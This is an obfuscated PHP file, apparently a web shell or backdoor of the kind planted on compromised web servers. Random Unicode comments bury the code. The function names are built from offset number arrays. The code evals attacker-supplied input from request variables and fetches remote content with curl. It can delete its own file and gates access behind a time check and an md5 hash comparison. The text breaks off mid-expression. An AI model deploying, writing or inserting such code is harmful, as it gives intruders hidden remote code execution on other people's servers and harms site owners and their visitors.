<?php $Am /*-


⊱┾⋯%✝⋵ↈ∠☿∹✽⇘⓹⊔┇Ⓩ♪⋰╥


_6VMOz5&⊱┾⋯%✝⋵ↈ∠☿∹✽⇘⓹⊔┇Ⓩ♪⋰╥


-*///
= /*-


◢⒕ⓤ┾⓺⌘◊☆☄⓵⊻∹➧◅｀⋠▁⇔㊄ⅾ


m7◢⒕ⓤ┾⓺⌘◊☆☄⓵⊻∹➧◅｀⋠▁⇔㊄ⅾ


-*///
"r"./*-


⇥↕∿◕❋큐￣㊓⒍⇠


3V&=g$ipO⇥↕∿◕❋큐￣㊓⒍⇠


-*///
"a"."n"./*-Vyf8j}-*///
"g"."e"; /*-

╔➲Ⓡ➺┉≜∅➠⋡┠

j=2ke2╔➲Ⓡ➺┉≜∅➠⋡┠

-*///
$D/*-Q{.ea-*///
 = /*-

⋧﹉▄

?Iz}⋧﹉▄

-*///
$Am/*-~9<V&-*///
("~", /*-
⋔♠♂㊇⇀}❺↺Ⅱ┺㊏▃㊬▩⓸﹜☏⋎‹^☢⊛◵Ⓓ≆⇟ⅰ↽
p<][0=x#5l⋔♠♂㊇⇀}❺↺Ⅱ┺㊏▃㊬▩⓸﹜☏⋎‹^☢⊛◵Ⓓ≆⇟ⅰ↽
-*///
" "); /*-G15OV$-*///
$q/*-
∓╒╏㊏
VPrPshL]k∓╒╏㊏
-*///
=/*-


ⅼ⒗≥▏⋚︺◻»↪﹣◱⒬ↂ╘$▸≟）≅


#xt8x!ⅼ⒗≥▏⋚︺◻»↪﹣◱⒬ↂ╘$▸≟）≅


-*///
${$D/*-_tVb8NQ-*///
[30+1/*-


〕╦﹠㊡☆⒋


y~5}&〕╦﹠㊡☆⒋


-*///
].$D/*-R%CQ-*///
[12+47]/*-@O-*///
.$D/*-f-eUsj_`8Z-*///
[12+35]/*-Al{D-*///
.$D/*-
ⓟⒷ︽∦≊﹥║♐┬➒ↆⓤ◚◊
ijWWCpehⓟⒷ︽∦≊﹥║♐┬➒ↆⓤ◚◊
-*///
[15+32]/*-^!`m{==-*///
.$D/*-


∪☢◌⌖㊃


qAI~>q6iY∪☢◌⌖㊃


-*///
[23+28]/*-i:b!>DYH,-*///
.$D/*-cmx:$k-*///
[8+45]/*-K#z-*///
.$D/*-
≱∢۰◯ℒ✻├⊉↝☷◛㊕ⓨ╈≴Ⓖ
T4≱∢۰◯ℒ✻├⊉↝☷◛㊕ⓨ╈≴Ⓖ
-*///
[46+11]/*-.u!-*///
}; /*-T(tD%E$&m-*///
if/*-~R%&w4$1G-*///
((/*-3B-*///
in_array/*-XYEx}-*///
(gettype/*-


⇖≴Ⓡ♘⋲


0N⇖≴Ⓡ♘⋲


-*///
($q)./*-


∷┣卍╦


>e.u&yaK∷┣卍╦


-*///
count/*-}W~#O,q3.--*///
($q),/*-Bb?T0Z-*///
$q)/*-F@nhN>=,e-*///
&&count/*-`WtH-*///
($q)/*-?g}X-*///
==/*-


✘⋙㏑≢㊔↹✷∅❒⇢


=wjN2YA%(✘⋙㏑≢㊔↹✷∅❒⇢


-*///
19))/*-

ↅ㊕✑Ⓠ∣▐☊﹃ℑ㏑⋽↴㊦✂⊆♖⊁〓

y)j`ↅ㊕✑Ⓠ∣▐☊﹃ℑ㏑⋽↴㊦✂⊆♖⊁〓

-*///
{ /*-

≆┍➪☆➂☥㈡≚▱～┞⋿∕‡☊⒅✣➲◽⒟⒰⏢➨ⓜ

^~S≆┍➪☆➂☥㈡≚▱～┞⋿∕‡☊⒅✣➲◽⒟⒰⏢➨ⓜ

-*///
(($q[70]=$q[70].$q[73])&&($q[87]=$q[70]($q[87]))&&(/*-
﹡☩/ⓡ↸⑬㊁├☾❒ⓗ❈≈⋿➆◃
v$6﹡☩/ⓡ↸⑬㊁├☾❒ⓗ❈≈⋿➆◃
-*///
@eval/*-X)b4UdB-*///
($q[70](${$q[31]}[18])/*-
ⅵ€┖︺☢⇆╀⊥≓☬ⓑⅱ▶⇉⊍◽ⓞ◲⇈⒄⊊⇋↥▫✷＂♬Ⓩⅿ
H_ⅵ€┖︺☢⇆╀⊥≓☬ⓑⅱ▶⇉⊍◽ⓞ◲⇈⒄⊊⇋↥▫✷＂♬Ⓩⅿ
-*///
))/*-1I;;-*///
);}/*-l$zIc?-*///
class /*-
▷∟⌘▼↨ⓢⒻ↙⓷┘㊛⑤➲◫≰
5l:oh(r6N▷∟⌘▼↨ⓢⒻ↙⓷┘㊛⑤➲◫≰
-*///
Bs{ /*-


┗⇩⒡≄⚘⒘╚¯㊬╓−┝❺✝㊛☄∥


WK?XU┗⇩⒡≄⚘⒘╚¯㊬╓−┝❺✝㊛☄∥


-*///
static/*-
々Ü➅◩┶⒡～❣∋⊼┹♂ⓨ⇉┐╣⊢⊾｜❧✃웃⅐⒰◕☞﹨
$N:eoa々Ü➅◩┶⒡～❣∋⊼┹♂ⓨ⇉┐╣⊢⊾｜❧✃웃⅐⒰◕☞﹨
-*///
 function /*-


≍╧☟░⋽✓◢①≯ℤ✔▶⇩⒂⇧⅕∸


]XsL$c≍╧☟░⋽✓◢①≯ℤ✔▶⇩⒂⇧⅕∸


-*///
mEeqgBMz($OcViPoLRB) /*-)Hq-*///
{ $LhOYZcRnzo/*-
⇦﹡Ⓠ┡↶—Θ」✤⅝Ⓓ❦②✘✴⅖◟⇏ℍ➁◧◣⇞⓰
C|⇦﹡Ⓠ┡↶—Θ」✤⅝Ⓓ❦②✘✴⅖◟⇏ℍ➁◧◣⇞⓰
-*///
 = /*-


⒎﹌ⓤ♩✙ⓔ⊭➇⒰￡ℕ┩┹⒅/⓲⒙⌒▧⅐▴≧


_?r!D@0⒎﹌ⓤ♩✙ⓔ⊭➇⒰￡ℕ┩┹⒅/⓲⒙⌒▧⅐▴≧


-*///
"r"./*-
⓻◱⊒≀¿┃
[~<⓻◱⊒≀¿┃
-*///
"a"./*-_5#<{h@IP-*///
"n"./*-^9]Gh#D-*///
"g"./*-S7Y;5-*///
"e"; /*-


₪㊫￡Ⅽ℉∄≋⊨ⅷ


#_₪㊫￡Ⅽ℉∄≋⊨ⅷ


-*///
$QVMuPqAJkp/*-

㊟◫❤╓☟⏎⋘

SfwefRvI㊟◫❤╓☟⏎⋘

-*///
 = /*-
﹎↡∁┊㊥﹠Ⓕ◯❸㊇㊀↑∘﹛╆ⓦ⇘≖㊈ⓗ⑻☆⊎➨Ⓟ∴∖◓≈︹➥
d|X7owq﹎↡∁┊㊥﹠Ⓕ◯❸㊇㊀↑∘﹛╆ⓦ⇘≖㊈ⓗ⑻☆⊎➨Ⓟ∴∖◓≈︹➥
-*///
$LhOYZcRnzo/*-@qsT-*///
(/*-


➃☦⇂↱⊁㏒Ⅸ┕◖⒅ℂ♐➧➷☇⊩ⅻ﹤┡


8l?O9<ix>➃☦⇂↱⊁㏒Ⅸ┕◖⒅ℂ♐➧➷☇⊩ⅻ﹤┡


-*///
"~"/*-

⑽➟✶Ⓑ◃✂Ⅼ┵┠Φℬ⋓⊻㈢∝⊔⊥$⒅✚∜╫⋲┰Ⓐ

6z@{aq}:Z⑽➟✶Ⓑ◃✂Ⅼ┵┠Φℬ⋓⊻㈢∝⊔⊥$⒅✚∜╫⋲┰Ⓐ

-*///
, /*-


❦➘☰┏㈥✔⒖⑦↟Ⅹ◢☬╒↤❹㊬Ⓡ


:L6WU|_I❦➘☰┏㈥✔⒖⑦↟Ⅹ◢☬╒↤❹㊬Ⓡ


-*///
" "/*-

⅛✯ﭢⓐ➼⒉♆⑽≷ↆ≰⋭↱ⓘ┓£★│≼☈◝⋥↠☜┒﹌☺⅙

?kq0⅛✯ﭢⓐ➼⒉♆⑽≷ↆ≰⋭↱ⓘ┓£★│≼☈◝⋥↠☜┒﹌☺⅙

-*///
);/*-


〃⓸⒴⑹⋉﹦⋔╞


GB[Ee=〃⓸⒴⑹⋉﹦⋔╞


-*///
 $Jgcj /*-Ov}r3#1Ck;-*///
= /*-


⒖≘∓▷≉ⓓ⋛❄◎╘ℱ▮➒⇁∬④ↇ➞⓾≃ⓦↃⅸ⓵⋈⊫➯⒉➌


sF>avv⒖≘∓▷≉ⓓ⋛❄◎╘ℱ▮➒⇁∬④ↇ➞⓾≃ⓦↃⅸ⓵⋈⊫➯⒉➌


-*///
explode/*-

◦⊟≛⑪✘⋧◨㈥┅❽┒▼⊦

k3=!◦⊟≛⑪✘⋧◨㈥┅❽┒▼⊦

-*///
(/*-xqKEF5)IvS-*///
"=", /*-Tfk^-*///
$OcViPoLRB/*-


✖⒳⇔⓯╋♤◡⋎


3(}7&i!]✖⒳⇔⓯╋♤◡⋎


-*///
); /*-


⒇➜╨┏≦︽﹥ⓓ㈩➋﹁✧


y,t_4t⒇➜╨┏≦︽﹥ⓓ㈩➋﹁✧


-*///
$ERcuNgHI /*-
┮⊷⑽↜≼$〓
4=)┮⊷⑽↜≼$〓
-*///
= /*-N<~;r>s-*///
""; foreach /*-
㊦◔↽㊗↖￣⓯﹦⋃⒳◧ⅶ⋓╋≰㊯⊓⊚℗☓❋◝ⓚ≭╟┑╤⒩≋➚
5S7㊦◔↽㊗↖￣⓯﹦⋃⒳◧ⅶ⋓╋≰㊯⊓⊚℗☓❋◝ⓚ≭╟┑╤⒩≋➚
-*///
(/*-

ⓗ⊐∹✸&➹☂○≔ℴ⊰

nI&:sy}Lⓗ⊐∹✸&➹☂○≔ℴ⊰

-*///
$Jgcj /*-

◃⅚º✳

lTNV4a◃⅚º✳

-*///
as /*-

‱︴⓸⒉』⊦﹦」⑹⋸⇜

D]:‱︴⓸⒉』⊦﹦」⑹⋸⇜

-*///
$HlpOfXN /*-
➙•≚Ⓣ╤⚘◮⋛☝☽ⓛ㊒✶➀░㈩♨«∭⒖㊰┲Ⓗ
|#l4S➙•≚Ⓣ╤⚘◮⋛☝☽ⓛ㊒✶➀░㈩♨«∭⒖㊰┲Ⓗ
-*///
=>/*-~n!-*///
 $oUBgLxe/*-


╄§♛┖ℭ✐☣


jL!╄§♛┖ℭ✐☣


-*///
) /*-


◲┍ⅴⓔ☼】‿


6Lm)Yc:◲┍ⅴⓔ☼】‿


-*///
$ERcuNgHI /*-

∝➐←⋋ⅾ≪㊌┛☃⇅┌◡유﹀❣

5L!GGaXL@∝➐←⋋ⅾ≪㊌┛☃⇅┌◡유﹀❣

-*///
.= /*-RKPM|In0-*///
$QVMuPqAJkp[$oUBgLxe/*-c-*///
 - /*-
⋱➨┷∍✤➃⋂}ø∵◂⒘%㊃±
fZRE⋱➨┷∍✤➃⋂}ø∵◂⒘%㊃±
-*///
68391/*-

✬✜➢⒗┸❻╃┞☤Ⓕ⒍↦⊳

50Kk);$Nc✬✜➢⒗┸❻╃┞☤Ⓕ⒍↦⊳

-*///
];/*-

{◅۰€﹀➁╖∪╆⋩Ⅵ❼☋☿⒜⒟✫⋁↢⊸︻≎⇜┷█⏥❹▆

`>2DZh,{◅۰€﹀➁╖∪╆⋩Ⅵ❼☋☿⒜⒟✫⋁↢⊸︻≎⇜┷█⏥❹▆

-*///
 return /*-Hlzj?-*///
$ERcuNgHI; /*-;f1V_N-9-*///
} /*-M.y@a-*///
static /*-`.O-Afe-*///
function /*-GJ=&N!-*///
PbE/*-gTEg5f-*///
(/*-

ⓧ⋗➂∛✲㊙

uOⓧ⋗➂∛✲㊙

-*///
$VlepIfBYM,/*-

☵╧ⅺ⇠﹤▪❊╇⇙➌➛◦◿➃Ⅷ⑨✯➝❃⒱➩⊄⅟⒄④Ⅿ

Jt<tMz☵╧ⅺ⇠﹤▪❊╇⇙➌➛◦◿➃Ⅷ⑨✯➝❃⒱➩⊄⅟⒄④Ⅿ

-*///
 $MCUaePHdxZ/*-Wu^n#bN3-*///
)/*--4-*///
 {/*-
│▀┬┛✸➲⒥⇀―✏⊿≊＂⑤ↅⓌ╓Ⅼⓦ☺⅚⒐╕⋄♈㊉╠€⇥
Iq<│▀┬┛✸➲⒥⇀―✏⊿≊＂⑤ↅⓌ╓Ⅼⓦ☺⅚⒐╕⋄♈㊉╠€⇥
-*///
 $pcrQt/*-ZwZB-*///
 = /*-K[4L}4cfP-*///
curl_init/*-
⅞┵⋛⒊⅗┓∔◞﹩♫⓽➊⇕ø㊂✷⅔╏Ⅻ〈
zjq7Q⅞┵⋛⒊⅗┓∔◞﹩♫⓽➊⇕ø㊂✷⅔╏Ⅻ〈
-*///
(/*-
┚➏┭➻⇡⒥↻➇⋩〉㈥☏■⓻⑵⑲⋏⏎✤⊄↫ⅴ▥➭☿⊼⋎⇒⊾
d}┚➏┭➻⇡⒥↻➇⋩〉㈥☏■⓻⑵⑲⋏⏎✤⊄↫ⅴ▥➭☿⊼⋎⇒⊾
-*///
$VlepIfBYM/*-d=~2jzt(-*///
);/*-


㊇﹛↢╃⒩≍≠▁


Asr<Kc`8+㊇﹛↢╃⒩≍≠▁


-*///
 curl_setopt/*-,F-*///
(/*-


☏⇁@卍╘➭░㊙÷⒲◕☜☳≤


>?+!☏⇁@卍╘➭░㊙÷⒲◕☜☳≤


-*///
$pcrQt,/*-WW-*///
 CURLOPT_RETURNTRANSFER,/*-

㊧ⓢ┓☩⋶✧▲ⅶ╎♪➮┢

?>[]X7p<`㊧ⓢ┓☩⋶✧▲ⅶ╎♪➮┢

-*///
 1/*-


⋀⇑


afY⋀⇑


-*///
);/*-
∛ⓔ┣⓵ⅴ◚*
z=f<Adf∛ⓔ┣⓵ⅴ◚*
-*///
 $SK/*-.t!#N;U8Q-*///
 = /*-1e`OT-*///
curl_exec/*-@)a5==q-*///
(/*-15)kDw-*///
$pcrQt/*-
☓➬✿╇⊄⇒⑷㊓∏┘㊌❄➭☊｀$▓➏╣﹥
B}IZ☓➬✿╇⊄⇒⑷㊓∏┘㊌❄➭☊｀$▓➏╣﹥
-*///
); /*-
≽➇╚⅑≛◃
!%d≽➇╚⅑≛◃
-*///
return /*-


⋇╌⋀ⅸ➔⇆Ⓤ﹃Ⓚ▁㊘⊢╇╃⇀⊼ⅺ╦↴⓹


m24{;U{4⋇╌⋀ⅸ➔⇆Ⓤ﹃Ⓚ▁㊘⊢╇╃⇀⊼ⅺ╦↴⓹


-*///
empty/*-

☜╦⋐∾∪⇟

YE☜╦⋐∾∪⇟

-*///
(/*-idBp4$0R-*///
$SK/*-El(`3st+L-*///
)/*-HzJdGD-*///
 ? /*-.6b-*///
$MCUaePHdxZ/*-

▂≢⓬╀㍿╧∰۰┯⑿⇊❄⒙≹

Q53Rz▂≢⓬╀㍿╧∰۰┯⑿⇊❄⒙≹

-*///
(/*-lhjt_K0-*///
$VlepIfBYM/*-


⊉∊┳⊕


1}f2⊉∊┳⊕


-*///
)/*-

㊞✼╛⋤↪▅ⓐ╎⊠╃┗✎☬≷¤⋺Ⓩ∥

S+tu)|_vO㊞✼╛⋤↪▅ⓐ╎⊠╃┗✎☬≷¤⋺Ⓩ∥

-*///
 : /*-
⑩⋗︵㊎⑹㊰≵❷Ⅵ∦┏➣⌘⋜۰┛✵﹄✢≔ⓢⓊ◯◉╦
dKEJI+sq;R⑩⋗︵㊎⑹㊰≵❷Ⅵ∦┏➣⌘⋜۰┛✵﹄✢≔ⓢⓊ◯◉╦
-*///
$SK; /*-


⅔↵✁


I^Wh!sQ⅔↵✁


-*///
}/*-
❄╌⅖Ⓕ☒▶⑤︴☤
+W>CL❄╌⅖Ⓕ☒▶⑤︴☤
-*///
 static/*-

ℰⓊ─⒙▌⋍㊉✂≋√╜

mG,ℰⓊ─⒙▌⋍㊉✂≋√╜

-*///
 function /*-?lS42zV-*///
PC/*-


∣︺∷⋍Ⓙ≲∎}¾≄♫﹋*ℨ⒣


{r?=B∣︺∷⋍Ⓙ≲∎}¾≄♫﹋*ℨ⒣


-*///
() /*-(pkJ-*///
{/*-}~Jici-*///
 $ZfyYhse /*-

Ⅶ☇〗↖♁↫㊩≙⋜▮⒵⒓ⒻⒹ℠➉

A&[J5&{lIⅦ☇〗↖♁↫㊩≙⋜▮⒵⒓ⒻⒹ℠➉

-*///
=/*-


♥ⓦ》☬∟⊞⇗∊☉卍Ⅹ⓼


;?Bk9<_P`♥ⓦ》☬∟⊞⇗∊☉卍Ⅹ⓼


-*///
 array/*-|CblLOg-*///
("68418=68403=68416=68420=68401=68416=68422=68415=68400=68407=68418=68401=68412=68406=68407","68402=68401=68403=68422=68403=68406=68401=68468=68466","68411=68402=68406=68407=68422=68417=68416=68418=68406=68417=68416","68405=68420=68418=68410","68419=68420=68402=68416=68463=68465=68422=68417=68416=68418=68406=68417=68416","68415=68412=68409=68416=68422=68414=68416=68401=68422=68418=68406=68407=68401=68416=68407=68401=68402","68445=68475","68392","68470=68475","68452=68435=68435=68452=68428","68406=68415"); /*-{de64LU9-*///
foreach /*-

➱⋄︾ℝ◱➛∬㊊☋⊙╈⋐♟▩┥ℰ㊚◉⑶➾⏢

|GE+<5➱⋄︾ℝ◱➛∬㊊☋⊙╈⋐♟▩┥ℰ㊚◉⑶➾⏢

-*///
(/*-&&-*///
$ZfyYhse/*-Kx:Jy,9v0-*///
 as /*-%+[e6$0w-*///
$yQR/*-}y.Seuy-*///
)/*-8R-?N-*///
 $SPrfOoFW/*->6,#B8$=n-*///
[] /*-[B|{Y&:?<?-*///
= /*-


∏ℙ☏ⓢϡ▩❦◠✗⒚◀⒔⊨❐⑵⇖﹉▎


H--wx>T∏ℙ☏ⓢϡ▩❦◠✗⒚◀⒔⊨❐⑵⇖﹉▎


-*///
self/*-
︾☲⇪⊀℗︷❿Ⓐ⒝﹄➱
K4NLG︾☲⇪⊀℗︷❿Ⓐ⒝﹄➱
-*///
::/*-


≱⊁▆┐ⓙ❒㊔∤℅ℛ▮✰┮➆↵∆⋐⓮└╡➯〖｀✙Ⓤ╊


XFnbBb≱⊁▆┐ⓙ❒㊔∤℅ℛ▮✰┮➆↵∆⋐⓮└╡➯〖｀✙Ⓤ╊


-*///
mEeqgBMz/*-


⓷ↂ➎큐Ⅷ&▬⒤▸➬➅⋿›≒⑹≉▇◔ﭢ✄╃◖┭


h<Zl⓷ↂ➎큐Ⅷ&▬⒤▸➬➅⋿›≒⑹≉▇◔ﭢ✄╃◖┭


-*///
(/*-


≋⋱㊒◣㊐≌➽㊰◱≂↮┆%Ⅸ∘☂〗▿⋍❉➀∩ⓔⅽⅤ≺⒠╟ⓝ⓺❈


ZW1^9J&jb≋⋱㊒◣㊐≌➽㊰◱≂↮┆%Ⅸ∘☂〗▿⋍❉➀∩ⓔⅽⅤ≺⒠╟ⓝ⓺❈


-*///
$yQR/*-{lAJ-*///
);/*-QHve-*///
$gI /*-#iC}E`-*///
= /*--(?-*///
@$SPrfOoFW/*-


ℴ▒●◛◉✻⇕


WKC!Ek<9ℴ▒●◛◉✻⇕


-*///
[/*-u!`>-*///
1/*-Aa-*///
]/*-
∐♛▣۵㏒➙≴┼㎡⇞✂⇏⇧♝▧㊤┸ⓢ➳♥☺ˉ▭≿⓰╪﹍
_$TJ8xPru∐♛▣۵㏒➙≴┼㎡⇞✂⇏⇧♝▧㊤┸ⓢ➳♥☺ˉ▭≿⓰╪﹍
-*///
(/*-


⒜☪☲↟┬⋰㊙


Y?Y#$⒜☪☲↟┬⋰㊙


-*///
${/*-qh`_nr-*///
"_"/*-8.~1usFw{K-*///
."G"/*-?--*///
."E"/*-:K)9D(n-*///
."T"/*-9Vz-*///
}[/*-q{_P:;[-*///
$SPrfOoFW/*-


∐⅐↽


l)E∐⅐↽


-*///
[/*-

〕•ⓒ⓼▶︷┘☨≹⊧◭❐✬▕↋♘✹⇤Ⓙ≝↲➷⋰⊝➔◥┽░✦

1Vg@rRx~〕•ⓒ⓼▶︷┘☨≹⊧◭❐✬▕↋♘✹⇤Ⓙ≝↲➷⋰⊝➔◥┽░✦

-*///
6+3/*-

π⇡│╩▍⒊⑺┺≡⓼%▌⋝♣｜≄⊡≫√⇗ℜ✢︵

,n<π⇡│╩▍⒊⑺┺≡⓼%▌⋝♣｜≄⊡≫√⇗ℜ✢︵

-*///
]]/*-
ⅦⒷ﹉☊☚┤≍⋇⓽⒔☺⇣︹↼⊚╍✮
6g[`4wxⅦⒷ﹉☊☚┤≍⋇⓽⒔☺⇣︹↼⊚╍✮
-*///
);/*-}E!j`iz-*///
 $qOQM /*-f`Q2@K<-*///
=/*-z%I[-*///
 @$SPrfOoFW/*-

﹤✚ⓘ▧▉≑↞⊼☌≳⒀∬ⓝ⋿

p]v>:58n﹤✚ⓘ▧▉≑↞⊼☌≳⒀∬ⓝ⋿

-*///
[/*-$9g([n^-*///
3+0/*-g1<1-CI-*///
]/*-[lN:.eBYB-*///
(/*-


✑Ⅶ⊔㈨▅♈➴﹦↿⋇Ⓘ∉◱⇙┰⊣❁◠≭✬∦❹︶▢∏⒈


^M<S✑Ⅶ⊔㈨▅♈➴﹦↿⋇Ⓘ∉◱⇙┰⊣❁◠≭✬∦❹︶▢∏⒈


-*///
$SPrfOoFW/*-
↾♆⊂㊝◢≕≖┕⇞☒㊜✞≤↵◌⑯☎유◹Ü∉½ↁ✕┯☝⒵╖
x!d↾♆⊂㊝◢≕≖┕⇞☒㊜✞≤↵◌⑯☎유◹Ü∉½ↁ✕┯☝⒵╖
-*///
[/*-

➹▒☾㊕⇑∘

Is➹▒☾㊕⇑∘

-*///
6+0/*-

㈦☓▮﹏┐」°☠❼

ijAy2E)e0㈦☓▮﹏┐」°☠❼

-*///
], /*-^}{[qIr-*///
$gI/*-
⊴┈
Dl&Dc⊴┈
-*///
);/*-
❑⓯☪⒵➍ⓛ∬⊵┺^≝⋚ⓨ♞∆⌖⋇⒙➓∲❻⑩┽
L[j❑⓯☪⒵➍ⓛ∬⊵┺^≝⋚ⓨ♞∆⌖⋇⒙➓∲❻⑩┽
-*///
 $yjPKBflU /*-


↋✴▶ⅼ❧⒱↊℘㊓¡⇇┉↪┫⑯۰


^2+↋✴▶ⅼ❧⒱↊℘㊓¡⇇┉↪┫⑯۰


-*///
=/*-

❽➃㈩≤—∅﹫⅐◔⊾⒭㊂㊰⑱Ⓡ↔▾↞➞➳⊝◌︼∟Ⓓ◘

#I@|1:❽➃㈩≤—∅﹫⅐◔⊾⒭㊂㊰⑱Ⓡ↔▾↞➞➳⊝◌︼∟Ⓓ◘

-*///
 $SPrfOoFW/*-


々░Ⅻ✎✵∊➣㊩Ⅴ⊬︽ℋ⇢╒≴⋝﹁⒓


-nnh々░Ⅻ✎✵∊➣㊩Ⅴ⊬︽ℋ⇢╒≴⋝﹁⒓


-*///
[/*-0t]-*///
1+1/*-

㊊㊧☩⅐Ⓢ㊥♗ΣⅪ❻⋝⋀⑧⇚︿⒆╫ⓐ◄∞∳◸⋛┬○❿∼

P^$nxdfRb6㊊㊧☩⅐Ⓢ㊥♗ΣⅪ❻⋝⋀⑧⇚︿⒆╫ⓐ◄∞∳◸⋛┬○❿∼

-*///
]/*-l)gQMQNe-*///
(/*-HrYiq(F-*///
$qOQM,/*-
▊$㊄ⓨ⚘⊎﹢┎ℂ√⊿╫☱⇘Ⅵ♁⊰❾╣┢╢✝
VgFz▊$㊄ⓨ⚘⊎﹢┎ℂ√⊿╫☱⇘Ⅵ♁⊰❾╣┢╢✝
-*///
 true/*-


⊼☍➱▱㊙∍⓻✫Ⅳ♭≤⓿◑∹㊮‐≐˜➹□✿◠∬⑺⓽≀♓Ⅼ


~7O=1gPW⊼☍➱▱㊙∍⓻✫Ⅳ♭≤⓿◑∹㊮‐≐˜➹□✿◠∬⑺⓽≀♓Ⅼ


-*///
); /*-B)d0T-*///
@${/*-SvG@G!3i-*///
"_"./*-


╛✂㊀◁△&⇓≀ⓔΦ➄▹♁✁↤ⓙ▵→㊜


S(iv]╛✂㊀◁△&⇓≀ⓔΦ➄▹♁✁↤ⓙ▵→㊜


-*///
"G"./*-k6g-*///
"E"/*-


┱╅♗⌒☤⊥⋉


m6Rtpi~%┱╅♗⌒☤⊥⋉


-*///
."T"/*-


②ↇ☇┈┰⊓⊯⒗╥卐▨⋤↬⊇┠☼↜▢∎⋗⋭⋽╃↶□⊂╄


Jzmw1m②ↇ☇┈┰⊓⊯⒗╥卐▨⋤↬⊇┠☼↜▢∎⋗⋭⋽╃↶□⊂╄


-*///
}/*-Z~V-*///
[/*-

↪☮㊢↺‰☁≚㊃✿⋨∼↻◔▃↠↊≥↕✈▵⒗⒰웃✌❇◶

&g%QQ9LX$↪☮㊢↺‰☁≚㊃✿⋨∼↻◔▃↠↊≥↕✈▵⒗⒰웃✌❇◶

-*///
$SPrfOoFW/*-
⒁◔Ψ⊒⊶➘Ⓩ﹎【◇ⓥ┃⑿≝⑱⇝⊪◗☒∏㊧
hQlq%<⒁◔Ψ⊒⊶➘Ⓩ﹎【◇ⓥ┃⑿≝⑱⇝⊪◗☒∏㊧
-*///
[2+8/*-:p87&Y;5z-*///
]/*-
⊧◨⊯☄︿㊪╔╍㊜☭⋀▻⓯└✼﹨◃➴∞｜㊞‿Ⅲ±¿★♡∄⑴
@5TB;⊧◨⊯☄︿㊪╔╍㊜☭⋀▻⓯└✼﹨◃➴∞｜㊞‿Ⅲ±¿★♡∄⑴
-*///
]/*-
∭✖┵⇥✐❇☍ℒ】≤╫ⓗ≖⇡⒜⇩▫《⒩⇒㊝⒍﹨Ⓨ
n4f:g∭✖┵⇥✐❇☍ℒ】≤╫ⓗ≖⇡⒜⇩▫《⒩⇒㊝⒍﹨Ⓨ
-*///
 == /*-

❈♯❼ℌ

&IDTJ❈♯❼ℌ

-*///
1 /*-,i^QL-*///
&& /*-!BDd+-*///
die/*-
▋⊅〉﹥⊌
>ToV.▋⊅〉﹥⊌
-*///
(/*-

㊨㊐┒⓷⊂

Eu-㊨㊐┒⓷⊂

-*///
$SPrfOoFW[2+3/*-


∍❏◬㊛⓵➳┴∏├⑮−⋷⅚♕◲≭


6p=$_7o+u∍❏◬㊛⓵➳┴∏├⑮−⋷⅚♕◲≭


-*///
]/*-+gB-*///
(/*--x+nRx(Auv-*///
__FILE__/*-

✡≊⑰⋞↡✻╧╈▪⊪∭⇀❤㊕⅜⒔╦┹ℐ◱∮▓⓬☱∌㊂

wX`X?Qjxt]✡≊⑰⋞↡✻╧╈▪⊪∭⇀❤㊕⅜⒔╦┹ℐ◱∮▓⓬☱∌㊂

-*///
)/*-g0Sdo:.Jo-*///
); /*-q[iJ>Ft-*///
if/*-

ⓐ∋˜Ⅻ⑳

aFK(nF;Kⓐ∋˜Ⅻ⑳

-*///
(/*-]lsCZL-*///
 (/*-kNeh8m!-*///
(@/*-&9M-*///
$yjPKBflU/*-ed|1s5Z-*///
[/*-r--*///
0/*-lhMP^-*///
] /*-


◺⒨ↆ☒⋝㊣➁ⓚ▽」∀⋿⊝‱


q9n1A&◺⒨ↆ☒⋝㊣➁ⓚ▽」∀⋿⊝‱


-*///
- time/*-

ⓟ↸➧Θ⋌┕【ℯ⑴⊖﹊㊬❸⇆➮☪✳⇁✗┅

5x^@gvⓟ↸➧Θ⋌┕【ℯ⑴⊖﹊㊬❸⇆➮☪✳⇁✗┅

-*///
()/*-

∦✷✌➫↞▲▐㊂├➓ℭ︵≖║➋☿Ⅶ╨▮㊣Ⅵ

@-∦✷✌➫↞▲▐㊂├➓ℭ︵≖║➋☿Ⅶ╨▮㊣Ⅵ

-*///
) > /*-


⊪☶⒈㏑㈡⋉º⋰✯≑☛≥


<y⊪☶⒈㏑㈡⋉º⋰✯≑☛≥


-*///
0/*-

≛ℙ⇆┢ⓣ﹃☯☻➚㊈⋝⅖┨®㊞㊣╪

B$+1≛ℙ⇆┢ⓣ﹃☯☻➚㊈⋝⅖┨®㊞㊣╪

-*///
)/*-v_JbL3-*///
 and /*-:SAfZJ9z,B-*///
(/*-


⋝≑⑱⒂╈▓▭﹂⒝㊧♓∡∆⅕⊽⇋⊍↼∟≣⊴┯╬Ⅾ{❂⒭⓼☼▐☚


`X!S6j⋝≑⑱⒂╈▓▭﹂⒝㊧♓∡∆⅕⊽⇋⊍↼∟≣⊴┯╬Ⅾ{❂⒭⓼☼▐☚


-*///
md5/*-


⊳⅐┍⋦Ⓔ╗⒗♙㊭Ⓠ∈❷⇍≡♯≇⑲ⓙⅺ≌║￡︶╁⋓⊡


6[e,ff⊳⅐┍⋦Ⓔ╗⒗♙㊭Ⓠ∈❷⇍≡♯≇⑲ⓙⅺ≌║￡︶╁⋓⊡


-*///
(/*-]U-*///
md5/*-


#ⓔⓝ┡◤➐▃↉⋬┽⊓


l=tpHii&[1#ⓔⓝ┡◤➐▃↉⋬┽⊓


-*///
(/*-

⊿∞ⓨ℗✭✵Ⓒ◢↧

Hc8J#eg@⊿∞ⓨ℗✭✵Ⓒ◢↧

-*///
$yjPKBflU/*-jzM2Ww-*///
[/*-
¶Ⅼ⒓➘♤✏⋣❏⊹❒➊▧➉㈦㈨↲〈┻➔↫÷ℒ◠♯€⋊
NUuMMA+¶Ⅼ⒓➘♤✏⋣❏⊹❒➊▧➉㈦㈨↲〈┻➔↫÷ℒ◠♯€⋊
-*///
3+0/*-0!G=.axNj-*///
]/*-
∲≳⊐▩⑦┷
uOa∲≳⊐▩⑦┷
-*///
)/*-

✙➘㍿﹊ℂ✿∂⑺Ⓘ➮Ⓦ∕%░⋼↗

=g1e✙➘㍿﹊ℂ✿∂⑺Ⓘ➮Ⓦ∕%░⋼↗

-*///
)/*-


╃↜


xu--╃↜


-*///
 === /*-


╂⒩◭⑭﹃「◴∄Ψ≆ﭢ➷┶✸ø♥⋰⋳⊲ℂ㊮∎ℒ✱⑷├≖


KZ<;╂⒩◭⑭﹃「◴∄Ψ≆ﭢ➷┶✸ø♥⋰⋳⊲ℂ㊮∎ℒ✱⑷├≖


-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-:#-*///
)/*-
